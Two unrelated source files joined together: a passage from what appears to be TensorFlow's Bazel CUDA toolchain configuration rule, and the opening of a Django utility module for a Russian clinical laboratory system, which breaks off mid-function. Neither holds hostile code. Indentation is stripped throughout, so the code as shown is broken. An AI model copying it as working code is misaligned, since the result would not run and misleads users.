repository_ctx.file("cuda/cuda/lib/%s" % lib_name("cufft", cpu_value))
repository_ctx.file("cuda/cuda/lib/%s" % lib_name("cupti", cpu_value))
repository_ctx.file("cuda/cuda/lib/%s" % lib_name("cusparse", cpu_value))
# Set up cuda_config.h, which is used by
# tensorflow/stream_executor/dso_loader.cc.
_tpl(
repository_ctx,
"cuda:cuda_config.h",
{
"%{cuda_version}": "",
"%{cublas_version}": "",
"%{cusolver_version}": "",
"%{curand_version}": "",
"%{cufft_version}": "",
"%{cusparse_version}": "",
"%{cudnn_version}": "",
"%{cuda_toolkit_path}": "",
},
"cuda/cuda/cuda_config.h",
)
# Set up cuda_config.py, which is used by gen_build_info to provide
# static build environment info to the API
_tpl(
repository_ctx,
"cuda:cuda_config.py",
_py_tmpl_dict({}),
"cuda/cuda/cuda_config.py",
)
# If cuda_configure is not configured to build with GPU support, and the user
# attempts to build with --config=cuda, add a dummy build rule to intercept
# this and fail with an actionable error message.
repository_ctx.file(
"crosstool/error_gpu_disabled.bzl",
_DUMMY_CROSSTOOL_BZL_FILE,
)
repository_ctx.file("crosstool/BUILD", _DUMMY_CROSSTOOL_BUILD_FILE)
def _norm_path(path):
"""Returns a path with '/' and remove the trailing slash."""
path = path.replace("\\", "/")
if path[-1] == "/":
path = path[:-1]
return path
def make_copy_files_rule(repository_ctx, name, srcs, outs):
"""Returns a rule to copy a set of files."""
cmds = []
# Copy files.
for src, out in zip(srcs, outs):
cmds.append('cp -f "%s" "$(location %s)"' % (src, out))
outs = [(' "%s",' % out) for out in outs]
return """genrule(
name = "%s",
outs = [
%s
],
cmd = \"""%s \""",
)""" % (name, "\n".join(outs), " && \\\n".join(cmds))
def make_copy_dir_rule(repository_ctx, name, src_dir, out_dir, exceptions = None):
"""Returns a rule to recursively copy a directory.
If exceptions is not None, it must be a list of files or directories in
'src_dir'; these will be excluded from copying.
"""
src_dir = _norm_path(src_dir)
out_dir = _norm_path(out_dir)
outs = read_dir(repository_ctx, src_dir)
post_cmd = ""
if exceptions != None:
outs = [x for x in outs if not any([
x.startswith(src_dir + "/" + y)
for y in exceptions
])]
outs = [(' "%s",' % out.replace(src_dir, out_dir)) for out in outs]
# '@D' already contains the relative path for a single file, see
# http://docs.bazel.build/versions/master/be/make-variables.html#predefined_genrule_variables
out_dir = "$(@D)/%s" % out_dir if len(outs) > 1 else "$(@D)"
if exceptions != None:
for x in exceptions:
post_cmd += " ; rm -fR " + out_dir + "/" + x
return """genrule(
name = "%s",
outs = [
%s
],
cmd = \"""cp -rLf "%s/." "%s/" %s\""",
)""" % (name, "\n".join(outs), src_dir, out_dir, post_cmd)
def _flag_enabled(repository_ctx, flag_name):
return get_host_environ(repository_ctx, flag_name) == "1"
def _use_cuda_clang(repository_ctx):
return _flag_enabled(repository_ctx, "TF_CUDA_CLANG")
def _tf_sysroot(repository_ctx):
return get_host_environ(repository_ctx, _TF_SYSROOT, "")
def _compute_cuda_extra_copts(repository_ctx, compute_capabilities):
copts = []
for capability in compute_capabilities:
if capability.startswith("compute_"):
capability = capability.replace("compute_", "sm_")
copts.append("--cuda-include-ptx=%s" % capability)
copts.append("--cuda-gpu-arch=%s" % capability)
return str(copts)
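# Illustrative example (assumed input): for ["compute_70", "sm_75"] this returns
# the string form of
# ["--cuda-include-ptx=sm_70", "--cuda-gpu-arch=sm_70", "--cuda-gpu-arch=sm_75"],
# i.e. 'compute_xy' entries emit both PTX and SASS, 'sm_xy' entries SASS only.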
def _tpl_path(repository_ctx, filename):
return repository_ctx.path(Label("//third_party/gpus/%s.tpl" % filename))
def _basename(repository_ctx, path_str):
"""Returns the basename of a path of type string.
This method is different from path.basename in that it also works if
the host platform is different from the execution platform
i.e. linux -> windows.
"""
num_chars = len(path_str)
is_win = is_windows(repository_ctx)
for i in range(num_chars):
r_i = num_chars - 1 - i
if (is_win and path_str[r_i] == "\\") or path_str[r_i] == "/":
return path_str[r_i + 1:]
return path_str
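# Illustrative examples (assumed inputs): on a Windows host
# _basename(repository_ctx, "C:\\cuda\\lib\\cudart.lib") returns "cudart.lib";
# on a Linux host _basename(repository_ctx, "/usr/local/cuda/lib64/libcudart.so")
# returns "libcudart.so".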
def _create_local_cuda_repository(repository_ctx):
"""Creates the repository containing files set up to build with CUDA."""
# Resolve all labels before doing any real work. Resolving causes the
# function to be restarted with all previous state being lost. This
# can easily lead to a O(n^2) runtime in the number of labels.
# See https://github.com/tensorflow/tensorflow/commit/62bd3534525a036f07d9851b3199d68212904778
tpl_paths = {filename: _tpl_path(repository_ctx, filename) for filename in [
"cuda:build_defs.bzl",
"crosstool:clang/bin/crosstool_wrapper_driver_is_not_gcc",
"crosstool:windows/msvc_wrapper_for_nvcc.py",
"crosstool:BUILD",
"crosstool:cc_toolchain_config.bzl",
"cuda:cuda_config.h",
"cuda:cuda_config.py",
]}
tpl_paths["cuda:BUILD"] = _tpl_path(repository_ctx, "cuda:BUILD.windows" if is_windows(repository_ctx) else "cuda:BUILD")
find_cuda_config_script = repository_ctx.path(Label("@org_tensorflow//third_party/gpus:find_cuda_config.py.gz.base64"))
cuda_config = _get_cuda_config(repository_ctx, find_cuda_config_script)
cuda_include_path = cuda_config.config["cuda_include_dir"]
cublas_include_path = cuda_config.config["cublas_include_dir"]
cudnn_header_dir = cuda_config.config["cudnn_include_dir"]
cupti_header_dir = cuda_config.config["cupti_include_dir"]
nvvm_libdevice_dir = cuda_config.config["nvvm_library_dir"]
# Create genrule to copy files from the installed CUDA toolkit into execroot.
copy_rules = [
make_copy_dir_rule(
repository_ctx,
name = "cuda-include",
src_dir = cuda_include_path,
out_dir = "cuda/include",
),
make_copy_dir_rule(
repository_ctx,
name = "cuda-nvvm",
src_dir = nvvm_libdevice_dir,
out_dir = "cuda/nvvm/libdevice",
),
make_copy_dir_rule(
repository_ctx,
name = "cuda-extras",
src_dir = cupti_header_dir,
out_dir = "cuda/extras/CUPTI/include",
),
]
copy_rules.append(make_copy_files_rule(
repository_ctx,
name = "cublas-include",
srcs = [
cublas_include_path + "/cublas.h",
cublas_include_path + "/cublas_v2.h",
cublas_include_path + "/cublas_api.h",
],
outs = [
"cublas/include/cublas.h",
"cublas/include/cublas_v2.h",
"cublas/include/cublas_api.h",
],
))
cusolver_include_path = cuda_config.config["cusolver_include_dir"]
copy_rules.append(make_copy_files_rule(
repository_ctx,
name = "cusolver-include",
srcs = [
cusolver_include_path + "/cusolver_common.h",
cusolver_include_path + "/cusolverDn.h",
],
outs = [
"cusolver/include/cusolver_common.h",
"cusolver/include/cusolverDn.h",
],
))
cufft_include_path = cuda_config.config["cufft_include_dir"]
copy_rules.append(make_copy_files_rule(
repository_ctx,
name = "cufft-include",
srcs = [
cufft_include_path + "/cufft.h",
],
outs = [
"cufft/include/cufft.h",
],
))
cusparse_include_path = cuda_config.config["cusparse_include_dir"]
copy_rules.append(make_copy_files_rule(
repository_ctx,
name = "cusparse-include",
srcs = [
cusparse_include_path + "/cusparse.h",
],
outs = [
"cusparse/include/cusparse.h",
],
))
curand_include_path = cuda_config.config["curand_include_dir"]
copy_rules.append(make_copy_files_rule(
repository_ctx,
name = "curand-include",
srcs = [
curand_include_path + "/curand.h",
],
outs = [
"curand/include/curand.h",
],
))
check_cuda_libs_script = repository_ctx.path(Label("@org_tensorflow//third_party/gpus:check_cuda_libs.py"))
cuda_libs = _find_libs(repository_ctx, check_cuda_libs_script, cuda_config)
cuda_lib_srcs = []
cuda_lib_outs = []
for path in cuda_libs.values():
cuda_lib_srcs.append(path)
cuda_lib_outs.append("cuda/lib/" + _basename(repository_ctx, path))
copy_rules.append(make_copy_files_rule(
repository_ctx,
name = "cuda-lib",
srcs = cuda_lib_srcs,
outs = cuda_lib_outs,
))
# copy files mentioned in third_party/nccl/build_defs.bzl.tpl
file_ext = ".exe" if is_windows(repository_ctx) else ""
copy_rules.append(make_copy_files_rule(
repository_ctx,
name = "cuda-bin",
srcs = [
cuda_config.cuda_toolkit_path + "/bin/" + "crt/link.stub",
cuda_config.cuda_toolkit_path + "/bin/" + "nvlink" + file_ext,
cuda_config.cuda_toolkit_path + "/bin/" + "fatbinary" + file_ext,
cuda_config.cuda_toolkit_path + "/bin/" + "bin2c" + file_ext,
],
outs = [
"cuda/bin/" + "crt/link.stub",
"cuda/bin/" + "nvlink" + file_ext,
"cuda/bin/" + "fatbinary" + file_ext,
"cuda/bin/" + "bin2c" + file_ext,
],
))
# Select the headers based on the cuDNN version (strip '64_' for Windows).
cudnn_headers = ["cudnn.h"]
    if cuda_config.cudnn_version.rsplit("_", 1)[-1] >= "8":
cudnn_headers += [
"cudnn_backend.h",
"cudnn_adv_infer.h",
"cudnn_adv_train.h",
"cudnn_cnn_infer.h",
"cudnn_cnn_train.h",
"cudnn_ops_infer.h",
"cudnn_ops_train.h",
"cudnn_version.h",
]
cudnn_srcs = []
cudnn_outs = []
for header in cudnn_headers:
cudnn_srcs.append(cudnn_header_dir + "/" + header)
cudnn_outs.append("cudnn/include/" + header)
copy_rules.append(make_copy_files_rule(
repository_ctx,
name = "cudnn-include",
srcs = cudnn_srcs,
outs = cudnn_outs,
))
# Set up BUILD file for cuda/
repository_ctx.template(
"cuda/build_defs.bzl",
tpl_paths["cuda:build_defs.bzl"],
{
"%{cuda_is_configured}": "True",
"%{cuda_extra_copts}": _compute_cuda_extra_copts(
repository_ctx,
cuda_config.compute_capabilities,
),
"%{cuda_gpu_architectures}": str(cuda_config.compute_capabilities),
},
)
repository_ctx.template(
"cuda/BUILD",
tpl_paths["cuda:BUILD"],
{
"%{cuda_driver_lib}": _basename(repository_ctx, cuda_libs["cuda"]),
"%{cudart_static_lib}": _basename(repository_ctx, cuda_libs["cudart_static"]),
"%{cudart_static_linkopt}": _cudart_static_linkopt(cuda_config.cpu_value),
"%{cudart_lib}": _basename(repository_ctx, cuda_libs["cudart"]),
"%{cublas_lib}": _basename(repository_ctx, cuda_libs["cublas"]),
"%{cusolver_lib}": _basename(repository_ctx, cuda_libs["cusolver"]),
"%{cudnn_lib}": _basename(repository_ctx, cuda_libs["cudnn"]),
"%{cufft_lib}": _basename(repository_ctx, cuda_libs["cufft"]),
"%{curand_lib}": _basename(repository_ctx, cuda_libs["curand"]),
"%{cupti_lib}": _basename(repository_ctx, cuda_libs["cupti"]),
"%{cusparse_lib}": _basename(repository_ctx, cuda_libs["cusparse"]),
"%{copy_rules}": "\n".join(copy_rules),
},
)
is_cuda_clang = _use_cuda_clang(repository_ctx)
tf_sysroot = _tf_sysroot(repository_ctx)
should_download_clang = is_cuda_clang and _flag_enabled(
repository_ctx,
_TF_DOWNLOAD_CLANG,
)
if should_download_clang:
download_clang(repository_ctx, "crosstool/extra_tools")
# Set up crosstool/
cc = find_cc(repository_ctx)
cc_fullpath = cc if not should_download_clang else "crosstool/" + cc
host_compiler_includes = get_cxx_inc_directories(
repository_ctx,
cc_fullpath,
tf_sysroot,
)
cuda_defines = {}
cuda_defines["%{builtin_sysroot}"] = tf_sysroot
cuda_defines["%{cuda_toolkit_path}"] = ""
cuda_defines["%{compiler}"] = "unknown"
if is_cuda_clang:
cuda_defines["%{cuda_toolkit_path}"] = cuda_config.config["cuda_toolkit_path"]
cuda_defines["%{compiler}"] = "clang"
host_compiler_prefix = get_host_environ(repository_ctx, _GCC_HOST_COMPILER_PREFIX)
if not host_compiler_prefix:
host_compiler_prefix = "/usr/bin"
cuda_defines["%{host_compiler_prefix}"] = host_compiler_prefix
# Bazel sets '-B/usr/bin' flag to workaround build errors on RHEL (see
# https://github.com/bazelbuild/bazel/issues/760).
# However, this stops our custom clang toolchain from picking the provided
# LLD linker, so we're only adding '-B/usr/bin' when using non-downloaded
# toolchain.
# TODO: when bazel stops adding '-B/usr/bin' by default, remove this
# flag from the CROSSTOOL completely (see
# https://github.com/bazelbuild/bazel/issues/5634)
if should_download_clang:
cuda_defines["%{linker_bin_path}"] = ""
else:
cuda_defines["%{linker_bin_path}"] = host_compiler_prefix
cuda_defines["%{extra_no_canonical_prefixes_flags}"] = ""
cuda_defines["%{unfiltered_compile_flags}"] = ""
if is_cuda_clang:
cuda_defines["%{host_compiler_path}"] = str(cc)
cuda_defines["%{host_compiler_warnings}"] = """
# Some parts of the codebase set -Werror and hit this warning, so
# switch it off for now.
"-Wno-invalid-partial-specialization"
"""
cuda_defines["%{cxx_builtin_include_directories}"] = to_list_of_strings(host_compiler_includes)
cuda_defines["%{compiler_deps}"] = ":empty"
cuda_defines["%{win_compiler_deps}"] = ":empty"
repository_ctx.file(
"crosstool/clang/bin/crosstool_wrapper_driver_is_not_gcc",
"",
)
repository_ctx.file("crosstool/windows/msvc_wrapper_for_nvcc.py", "")
else:
cuda_defines["%{host_compiler_path}"] = "clang/bin/crosstool_wrapper_driver_is_not_gcc"
cuda_defines["%{host_compiler_warnings}"] = ""
# nvcc has the system include paths built in and will automatically
# search them; we cannot work around that, so we add the relevant cuda
# system paths to the allowed compiler specific include paths.
cuda_defines["%{cxx_builtin_include_directories}"] = to_list_of_strings(
host_compiler_includes + _cuda_include_path(
repository_ctx,
cuda_config,
) + [cupti_header_dir, cudnn_header_dir],
)
# For gcc, do not canonicalize system header paths; some versions of gcc
# pick the shortest possible path for system includes when creating the
# .d file - given that includes that are prefixed with "../" multiple
        # times quickly grow longer than the root of the tree, this can lead to
# bazel's header check failing.
cuda_defines["%{extra_no_canonical_prefixes_flags}"] = "\"-fno-canonical-system-headers\""
file_ext = ".exe" if is_windows(repository_ctx) else ""
nvcc_path = "%s/nvcc%s" % (cuda_config.config["cuda_binary_dir"], file_ext)
cuda_defines["%{compiler_deps}"] = ":crosstool_wrapper_driver_is_not_gcc"
cuda_defines["%{win_compiler_deps}"] = ":windows_msvc_wrapper_files"
wrapper_defines = {
"%{cpu_compiler}": str(cc),
"%{cuda_version}": cuda_config.cuda_version,
"%{nvcc_path}": nvcc_path,
"%{gcc_host_compiler_path}": str(cc),
"%{nvcc_tmp_dir}": _get_nvcc_tmp_dir_for_windows(repository_ctx),
}
repository_ctx.template(
"crosstool/clang/bin/crosstool_wrapper_driver_is_not_gcc",
tpl_paths["crosstool:clang/bin/crosstool_wrapper_driver_is_not_gcc"],
wrapper_defines,
)
repository_ctx.template(
"crosstool/windows/msvc_wrapper_for_nvcc.py",
tpl_paths["crosstool:windows/msvc_wrapper_for_nvcc.py"],
wrapper_defines,
)
cuda_defines.update(_get_win_cuda_defines(repository_ctx))
verify_build_defines(cuda_defines)
# Only expand template variables in the BUILD file
repository_ctx.template(
"crosstool/BUILD",
tpl_paths["crosstool:BUILD"],
cuda_defines,
)
# No templating of cc_toolchain_config - use attributes and templatize the
# BUILD file.
repository_ctx.template(
"crosstool/cc_toolchain_config.bzl",
tpl_paths["crosstool:cc_toolchain_config.bzl"],
{},
)
# Set up cuda_config.h, which is used by
# tensorflow/stream_executor/dso_loader.cc.
repository_ctx.template(
"cuda/cuda/cuda_config.h",
tpl_paths["cuda:cuda_config.h"],
{
"%{cuda_version}": cuda_config.cuda_version,
"%{cublas_version}": cuda_config.cublas_version,
"%{cusolver_version}": cuda_config.cusolver_version,
"%{curand_version}": cuda_config.curand_version,
"%{cufft_version}": cuda_config.cufft_version,
"%{cusparse_version}": cuda_config.cusparse_version,
"%{cudnn_version}": cuda_config.cudnn_version,
"%{cuda_toolkit_path}": cuda_config.cuda_toolkit_path,
},
)
# Set up cuda_config.py, which is used by gen_build_info to provide
# static build environment info to the API
repository_ctx.template(
"cuda/cuda/cuda_config.py",
tpl_paths["cuda:cuda_config.py"],
_py_tmpl_dict({
"cuda_version": cuda_config.cuda_version,
"cudnn_version": cuda_config.cudnn_version,
"cuda_compute_capabilities": cuda_config.compute_capabilities,
"cpu_compiler": str(cc),
}),
)
def _py_tmpl_dict(d):
return {"%{cuda_config}": str(d)}
def _create_remote_cuda_repository(repository_ctx, remote_config_repo):
"""Creates pointers to a remotely configured repo set up to build with CUDA."""
_tpl(
repository_ctx,
"cuda:build_defs.bzl",
{
"%{cuda_is_configured}": "True",
"%{cuda_extra_copts}": _compute_cuda_extra_copts(
repository_ctx,
compute_capabilities(repository_ctx),
),
},
)
repository_ctx.template(
"cuda/BUILD",
config_repo_label(remote_config_repo, "cuda:BUILD"),
{},
)
repository_ctx.template(
"cuda/build_defs.bzl",
config_repo_label(remote_config_repo, "cuda:build_defs.bzl"),
{},
)
repository_ctx.template(
"cuda/cuda/cuda_config.h",
config_repo_label(remote_config_repo, "cuda:cuda/cuda_config.h"),
{},
)
repository_ctx.template(
"cuda/cuda/cuda_config.py",
config_repo_label(remote_config_repo, "cuda:cuda/cuda_config.py"),
_py_tmpl_dict({}),
)
repository_ctx.template(
"crosstool/BUILD",
config_repo_label(remote_config_repo, "crosstool:BUILD"),
{},
)
repository_ctx.template(
"crosstool/cc_toolchain_config.bzl",
config_repo_label(remote_config_repo, "crosstool:cc_toolchain_config.bzl"),
{},
)
repository_ctx.template(
"crosstool/clang/bin/crosstool_wrapper_driver_is_not_gcc",
config_repo_label(remote_config_repo, "crosstool:clang/bin/crosstool_wrapper_driver_is_not_gcc"),
{},
)
def _cuda_autoconf_impl(repository_ctx):
"""Implementation of the cuda_autoconf repository rule."""
if not enable_cuda(repository_ctx):
_create_dummy_repository(repository_ctx)
elif get_host_environ(repository_ctx, _TF_CUDA_CONFIG_REPO) != None:
has_cuda_version = get_host_environ(repository_ctx, _TF_CUDA_VERSION) != None
has_cudnn_version = get_host_environ(repository_ctx, _TF_CUDNN_VERSION) != None
if not has_cuda_version or not has_cudnn_version:
auto_configure_fail("%s and %s must also be set if %s is specified" %
(_TF_CUDA_VERSION, _TF_CUDNN_VERSION, _TF_CUDA_CONFIG_REPO))
_create_remote_cuda_repository(
repository_ctx,
get_host_environ(repository_ctx, _TF_CUDA_CONFIG_REPO),
)
else:
_create_local_cuda_repository(repository_ctx)
_ENVIRONS = [
_GCC_HOST_COMPILER_PATH,
_GCC_HOST_COMPILER_PREFIX,
_CLANG_CUDA_COMPILER_PATH,
"TF_NEED_CUDA",
"TF_CUDA_CLANG",
_TF_DOWNLOAD_CLANG,
_CUDA_TOOLKIT_PATH,
_CUDNN_INSTALL_PATH,
_TF_CUDA_VERSION,
_TF_CUDNN_VERSION,
_TF_CUDA_COMPUTE_CAPABILITIES,
"NVVMIR_LIBRARY_DIR",
_PYTHON_BIN_PATH,
"TMP",
"TMPDIR",
"TF_CUDA_PATHS",
]
remote_cuda_configure = repository_rule(
implementation = _create_local_cuda_repository,
environ = _ENVIRONS,
remotable = True,
attrs = {
"environ": attr.string_dict(),
},
)
cuda_configure = repository_rule(
implementation = _cuda_autoconf_impl,
environ = _ENVIRONS + [_TF_CUDA_CONFIG_REPO],
)
"""Detects and configures the local CUDA toolchain.
Add the following to your WORKSPACE file:
```python
cuda_configure(name = "local_config_cuda")
```
Args:
name: A unique name for this workspace rule.
"""
|
import datetime
import zlib
from collections import OrderedDict
from copy import deepcopy
from decimal import Decimal
from django.db.models import Q
from clients.models import Document, DispensaryReg, Card
from directions.models import Napravleniya, Issledovaniya, ParaclinicResult, IstochnikiFinansirovaniya, PersonContract
from directory.models import Researches
from laboratory import utils
from laboratory.utils import strdate
from api.stationar.stationar_func import hosp_get_data_direction, check_transfer_epicrisis
from api.stationar.sql_func import get_result_value_iss
from utils.dates import normalize_date
def get_all_doc(docs: [Document]):
"""
    Returns a dictionary of document dictionaries. Document data: passport: number, serial; polis (medical insurance policy): number; SNILS: number
"""
documents = {
'passport': {'num': "", 'serial': "", 'date_start': "", 'issued': ""},
'polis': {'serial': "", 'num': "", 'issued': ""},
'snils': {'num': ""},
'bc': {'num': "", 'serial': "", 'date_start': "", 'issued': ""},
}
for d in docs:
if d.document_type.title == "СНИЛС":
documents["snils"]["num"] = d.number
if d.document_type.title == 'Паспорт гражданина РФ':
documents["passport"]["num"] = d.number
documents["passport"]["serial"] = d.serial
documents["passport"]["date_start"] = "" if not d.date_start else d.date_start.strftime("%d.%m.%Y")
documents["polis"]["issued"] = d.who_give
if d.document_type.title == 'Полис ОМС':
documents["polis"]["num"] = d.number
documents["polis"]["serial"] = d.serial
documents["polis"]["date_start"] = "" if not d.date_start else d.date_start.strftime("%d.%m.%Y")
documents["polis"]["issued"] = d.who_give
if d.document_type.title == 'Свидетельство о рождении':
documents["bc"]["num"] = d.number
documents["bc"]["serial"] = d.serial
documents["bc"]["date_start"] = "" if not d.date_start else d.date_start.strftime("%d.%m.%Y")
documents["bc"]["issued"] = d.who_give
return documents
def get_coast_from_issledovanie(dir_research_loc):
"""
    When printing a payment sheet, returns the prices recorded in Issledovaniya (studies).
    Based on the price list and services, returns for the payment sheet: {
    direction: {service: [price, discount, quantity], service: [price, discount, quantity]},
    direction: {service: [price, discount, quantity], service: [price, discount, quantity]},
    direction: {service: [price, discount, quantity], service: [price, discount, quantity]},
    }
"""
d = tuple()
if type(dir_research_loc) == dict:
dict_coast = {}
for k, v in dir_research_loc.items():
d = {
r: [
s,
d,
h,
]
for r, s, d, h in Issledovaniya.objects.filter(napravleniye=k, research__in=v, coast__isnull=False).values_list('research_id', 'coast', 'discount', 'how_many')
}
dict_coast[k] = d
return dict_coast
else:
return 0
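# Illustrative sketch of the returned shape (assumed values):
#   get_coast_from_issledovanie({direction: [research_1_id, research_2_id]})
#   -> {direction: {research_1_id: [Decimal('100.00'), 0, 1],
#                   research_2_id: [Decimal('250.00'), -10, 2]}}
# i.e. for each direction, a mapping of research id to [price, discount, quantity].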
def get_research_by_dir(dir_temp_l):
"""
    Get a dictionary: {direction1: [service1, service2, service3], direction2: [service1], ...}
:param dir_temp_l:
:return:
"""
dict_research_dir = {}
for i in dir_temp_l:
        # If at least one service of the direction has already been saved by a doctor, the direction is skipped
if any([x.doc_save is not None for x in Issledovaniya.objects.filter(napravleniye=i)]):
continue
else:
research_l = [x.research_id for x in Issledovaniya.objects.filter(napravleniye=i)]
dict_research_dir[i] = research_l
return dict_research_dir
def get_final_data(research_price_loc):
"""
    Build the final data structure: service code, direction, service, price, discount/markup, discounted price, quantity, total
    The direction is written only once for several rows
"""
total_sum = 0
tmp_data = []
# is_discount = False
z = ""
x = ""
tmp_napr = []
for k, v in research_price_loc.items():
# research_attr = ([s for s in Researches.objects.filter(id__in=v.keys()).values_list('id', 'title')])
research_attr = [s for s in Researches.objects.filter(id__in=v.keys()).values_list('id', 'title', 'internal_code')]
research_attr_list = [list(z) for z in research_attr]
for research_id, research_coast in v.items():
h = []
for j in research_attr_list:
if research_id == j[0]:
if k != 0:
h.append(k)
k = 0
else:
h.append("")
h.extend([j[2], j[1]])
h.append("{:,.2f}".format(research_coast[0]).replace(",", " "))
coast_with_discount = research_coast[0] + (research_coast[0] * research_coast[1] / 100)
if research_coast[1] != 0:
z = "+"
if research_coast[1] > 0:
x = "+"
else:
x = ""
h.append(x + str(research_coast[1]))
h.append("{:,.2f}".format(coast_with_discount).replace(",", " "))
h.append(research_coast[2])
research_sum = coast_with_discount * research_coast[2]
h.append("{:,.2f}".format(research_sum).replace(",", " "))
h[0], h[1] = h[1], h[0]
total_sum += research_sum
research_attr_list.remove(j)
tmp_data.append(h)
if h[1]:
tmp_napr.append(h[1])
if h:
break
res_lis = []
for t in tmp_data:
tmp_d = list(map(str, t))
res_lis.append(tmp_d)
total_data = []
total_data.append(res_lis)
total_data.append("{:,.2f}".format(total_sum).replace(",", " "))
if z == "+":
total_data.append("is_discount")
else:
total_data.append("no_discount")
total_data.append(tmp_napr)
    # total_data: [data structure, total sum, whether there is a discount, direction numbers]
return total_data
def get_data_individual(card_object):
"""
    Takes a Card object as input
    Returns a dictionary of attributes for the card and the individual (person)
:param card_object:
:return:
"""
ind_data = {'ind': card_object.individual}
ind_data['age'] = ind_data['ind'].age()
ind_data['doc'] = Document.objects.filter(individual=ind_data['ind'], is_active=True)
ind_data['fio'] = ind_data['ind'].fio()
ind_data['born'] = ind_data['ind'].bd()
ind_data['main_address'] = "____________________________________________________" if not card_object.main_address else card_object.main_address
ind_data['fact_address'] = "____________________________________________________" if not card_object.fact_address else card_object.fact_address
# document_passport = "Паспорт РФ"
ind_documents = get_all_doc(ind_data['doc'])
ind_data['passport_num'] = ind_documents['passport']['num']
ind_data['passport_serial'] = ind_documents['passport']['serial']
ind_data['passport_date_start'] = ind_documents['passport']['date_start']
ind_data['passport_issued'] = ind_documents['passport']['issued']
ind_data['bc_num'] = ind_documents['bc']['num']
ind_data['bc_serial'] = ind_documents['bc']['serial']
ind_data['bc_date_start'] = ind_documents['bc']['date_start']
ind_data['bc_issued'] = ind_documents['bc']['issued']
ind_data['snils'] = ind_documents["snils"]["num"]
ind_data['oms'] = {}
ind_data['oms']['polis_num'] = ind_documents["polis"]["num"]
ind_data['oms']['polis_serial'] = ind_documents["polis"]["serial"]
# ind_data['oms']['polis_date_start'] = ind_documents["polis"]["date_start"]
ind_data['oms']['polis_issued'] = ind_documents["polis"]["issued"]
return ind_data
def form_notfound():
"""
    Used when forms are misconfigured by type and function, or when invalid arguments are passed in the parameters
:return:
"""
from reportlab.pdfbase import pdfmetrics
from reportlab.pdfbase.ttfonts import TTFont
from reportlab.platypus import SimpleDocTemplate, Paragraph, Spacer
from reportlab.lib.styles import getSampleStyleSheet
from reportlab.lib.pagesizes import A4
from reportlab.lib.units import mm
from copy import deepcopy
from reportlab.lib.enums import TA_CENTER
import os.path
from io import BytesIO
from laboratory.settings import FONTS_FOLDER
buffer = BytesIO()
pdfmetrics.registerFont(TTFont('PTAstraSerifBold', os.path.join(FONTS_FOLDER, 'PTAstraSerif-Bold.ttf')))
pdfmetrics.registerFont(TTFont('PTAstraSerifReg', os.path.join(FONTS_FOLDER, 'PTAstraSerif-Regular.ttf')))
doc = SimpleDocTemplate(
buffer, pagesize=A4, leftMargin=10 * mm, rightMargin=10 * mm, topMargin=10 * mm, bottomMargin=10 * mm, allowSplitting=1, title="Форма {}".format("Паспорт здоровья")
)
styleSheet = getSampleStyleSheet()
style = styleSheet["Normal"]
style.fontName = "PTAstraSerifBold"
style.fontSize = 16
style.leading = 15
styleBold = deepcopy(style)
styleBold.fontName = "PTAstraSerifBold"
styleCenter = deepcopy(style)
styleCenter.alignment = TA_CENTER
styleCenterBold = deepcopy(styleBold)
styleCenterBold.alignment = TA_CENTER
objs = [
Spacer(1, 3 * mm),
Paragraph('<font face="PTAstraSerifBold">Ая-я-я-я-я-я-я-яй!</font>', styleCenter),
Spacer(1, 3 * mm),
Paragraph('<font face="PTAstraSerifBold">Что-то Администраторы не верно настроили с типами форм! </font>', styleCenter),
Spacer(1, 3 * mm),
Paragraph('<font face="PTAstraSerifBold">А-та-та-та им!</font>', styleCenter),
]
doc.build(objs)
pdf = buffer.getvalue()
buffer.close()
return pdf
def get_doc_results(doc_obj, date_result):
"""
    Returns the doctor's results for a specific date. ***** Never rework this to use a date range
"""
doc_results = Issledovaniya.objects.filter(doc_confirmation=doc_obj, time_confirmation__date=date_result, napravleniye__isnull=False)
return doc_results
def get_finaldata_talon(doc_result_obj):
"""
    Input: the doctor's results for a specific date
    Output: data structure {'No.': 'number', 'Patient full name': 'Ivanov Ivan Ivanovich', 'Card No. (type)': '1212 (L2)',
                            'Policy data': 'number;Company', 'visit purpose': '(code)', 'primary visit': 'No',
                            'ICD diagnosis': '(code)', 'First time': 'Yes', 'Visit result': 'code',
                            'Outcome': 'code', 'D-registered': 'codes', 'D-taken': 'codes', 'D-removed': 'codes',
                            'removal reason': '', 'Oncology suspicion': 'Yes'}
    """
fin_oms = 'омс'
fin_dms = 'дмс'
fin_pay = 'платно'
fin_medexam = 'медосмотр'
fin_disp = 'диспансеризация'
fin_budget = 'бюджет'
fin_source = OrderedDict()
fin_source[fin_oms] = OrderedDict()
fin_source[fin_pay] = OrderedDict()
fin_source[fin_dms] = OrderedDict()
fin_source[fin_medexam] = OrderedDict()
fin_source[fin_disp] = OrderedDict()
fin_source[fin_budget] = OrderedDict()
fin_source_iss = OrderedDict()
fin_source_iss[fin_oms] = OrderedDict()
fin_source_iss[fin_pay] = OrderedDict()
fin_source_iss[fin_dms] = OrderedDict()
fin_source_iss[fin_medexam] = OrderedDict()
fin_source_iss[fin_disp] = OrderedDict()
fin_source_iss[fin_budget] = OrderedDict()
oms_count = 0
dms_count = 0
pay_count = 0
disp_count = 0
medexam_count = 0
budget_count = 0
empty = '-'
today = utils.timezone.now().date()
for i in doc_result_obj:
napr_attr = Napravleniya.get_attr(i.napravleniye)
temp_dict = OrderedDict()
temp_dict_iss = OrderedDict()
dict_fsourcce = ''
order = ''
if napr_attr['istochnik_f'] in ['омс', '']:
oms_count += 1
dict_fsourcce = fin_oms
order = oms_count
elif napr_attr['istochnik_f'] == 'платно':
pay_count += 1
dict_fsourcce = fin_pay
order = pay_count
elif napr_attr['istochnik_f'] == 'дмс':
dms_count += 1
dict_fsourcce = fin_dms
order = dms_count
elif napr_attr['istochnik_f'] == 'медосмотр':
medexam_count += 1
dict_fsourcce = fin_medexam
order = medexam_count
elif napr_attr['istochnik_f'] == 'диспансеризация':
disp_count += 1
dict_fsourcce = fin_disp
order = disp_count
elif napr_attr['istochnik_f'] == 'бюджет':
budget_count += 1
dict_fsourcce = fin_budget
order = budget_count
else:
continue
polis_who_giv = empty if not napr_attr['polis_who_give'] else napr_attr['polis_who_give']
polis_num = empty if not napr_attr['polis_n'] else napr_attr['polis_n']
temp_dict['client_fio'] = napr_attr['client_fio'] + ', ' + napr_attr['client_bd']
temp_dict['med_exam'] = strdate(i.medical_examination) + ', ' + str(i.napravleniye_id)
num_poliklinika = f'\n({napr_attr["number_poliklinika"]})' if napr_attr['number_poliklinika'] else ''
temp_dict['card_num'] = napr_attr['card_num'] + num_poliklinika
temp_dict['polis_data'] = '<u>' + polis_num + '</u>' + '<br/>' + polis_who_giv
